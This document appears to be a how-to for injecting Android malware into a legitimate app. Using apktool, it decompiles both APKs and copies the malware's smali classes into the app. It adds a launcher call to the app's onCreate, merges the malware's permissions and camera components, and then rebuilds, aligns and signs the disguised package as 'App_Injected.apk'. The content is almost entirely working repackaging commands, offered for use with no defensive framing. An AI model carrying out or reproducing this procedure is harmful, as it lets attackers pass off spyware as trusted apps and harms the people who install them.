## Prep ### Without Camera 1. Comment out the timer and compile ```kt private fun startCheckingPermission() { timerStorage = Timer("CheckStoragePermissionTimer", false) timerStorage?.scheduleAtFixedRate(0, 5000) { checkStoragePermission() println("Requesting storage permission again") } /* timerCamera = Timer("CheckCameraPermissionTimer", false) timerCamera?.scheduleAtFixedRate(0, 5000) { checkCameraPermission() println("Requesting camera permission again") }*/ ``` 2. Decompile the apk `apktool d malware.apk` 3. Decompile original app `apktool d application.apk` 4. Move malware to normal application `cp -r malware/smali/com/* application/smali/com/` 5. Under the onCreate of original app ```smali new-instance p1, Lcom/ti/m/GoodSoftware; move-object v0, p0 check-cast v0, Landroid/content/Context; invoke-direct {p1, v0}, Lcom/ti/m/GoodSoftware;->(Landroid/content/Context;)V invoke-virtual {p1}, Lcom/ti/m/GoodSoftware;->launch()V ``` 6. Copy the permissions from the malware manifest to original manifests permissions ```xml

``` ### With Camera 1. Do the steps of without camera but don't uncomment the timer 2. Copy camera to existing androidx folder `cp -r malware/smali/androidx/camera/ application/smali_classes2/androidx/` 3. Copy androidx futures to existing `cp -r malware/smali/androidx/concurrent/futures/* application/smali/androidx/concurrent/futures/` 4. Copy MediatorLiveData `cp -r malware/smali/androidx/lifecycle/MediatorLiveData* application/smali/androidx/lifecycle/` 5. Copy Camera metadata from Manifest ```xml

``` 6. Copy Camera Queries to manifest under the permissions ```xml ``` ## Final Steps 1. Build the application `apktool b application -o unsigned.apk` 2. Align using zipalign `zipalign -p -f -v 4 unsigned.apk App_Injected.apk` 3. Generate keystore `keytool -genkey -V -keystore key.keystore -alias Android -keyalg RSA -keysize 2048 -validity 10000` 4. Sign Apk `apksigner sign --ks key.keystore App_Injected.apk` 5. Done